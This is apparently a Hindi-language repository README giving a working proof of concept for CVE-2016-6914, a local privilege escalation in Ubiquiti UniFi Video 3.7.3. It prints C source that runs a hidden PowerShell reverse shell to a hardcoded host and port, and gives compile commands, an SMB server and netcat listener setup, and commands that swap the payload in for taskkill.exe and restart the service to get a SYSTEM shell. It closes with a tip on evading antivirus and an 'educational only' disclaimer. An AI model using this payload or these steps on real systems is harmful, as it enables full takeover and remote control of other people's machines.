
CVE-2016-6914-UniFiVideo-LPE
इस रिपॉजिटरी में CVE-2016-6914 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट (PoC) है, जो Ubiquiti UniFi Video 3.7.3 को प्रभावित करने वाली स्थानीय विशेषाधिकार वृद्धि (LPE) कमजोरी है।
निम्न विशेषाधिकारों वाला हमलावर C:\ProgramData\unifi-video\ के अंदर एक विश्वसनीय बाइनरी (taskkill.exe) को दुर्भावनापूर्ण कोड से बदल सकता है, जो SYSTEM विशेषाधिकारों के साथ निष्पादित होता है।
1️⃣ taskkill.exe को एक दुर्भावनापूर्ण पेलोड (exploit.exe) से बदलें।
2️⃣ UniFi Video Service के चलने तक प्रतीक्षा करें या इसे मैन्युअल रूप से पुनरारंभ करें।
3️⃣ दुर्भावनापूर्ण पेलोड निष्पादित होता है, जिससे SYSTEM शेल प्राप्त होता है।
यह पेलोड taskkill.exe को बदलता है और एक रिवर्स शेल लॉन्च करता है।
#include <windows.h>
int main() {
system("powershell -NoP -W Hidden -c \"$client = New-Object System.Net.Sockets.TCPClient('10.10.16.5',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();\"");
return 0;
}
✅ MinGW का उपयोग करके संकलित करें: x86_64-w64-mingw32-gcc exploit.c -o exploit.exe
1️⃣ SMB शेयर सेट करें (रिमोट फ़ाइल वितरण के लिए) Kali पर, चलाएं: impacket-smbserver share . -smb2support
2️⃣ Netcat लिसनर प्रारंभ करें nc -lvnp 4444
3️⃣ लक्ष्य मशीन पर पेलोड पहुंचाएं लक्ष्य सिस्टम पर निम्न PowerShell कमांड चलाएं: copy \10.10.14.5\share\taskkill.exe C:\ProgramData\unifi-video\taskkill.exe stop-service UnifiVideoService -Force start-service UnifiVideoService
4️⃣ SYSTEM शेल प्राप्त करें एक बार निष्पादित होने पर, आपके लिसनर पर एक SYSTEM शेल खुल जाता है!
बुनियादी AV पहचान से बचने के लिए, प्रयास करें:
system() के बजाय वैकल्पिक सिस्कॉल का उपयोग करना।📢 यह PoC केवल शैक्षिक उद्देश्यों के लिए है! 🛑 अनधिकृत उपयोग अवैध और दंडनीय है। 👨💻 इसका उपयोग केवल कानूनी और नैतिक तरीके से करें।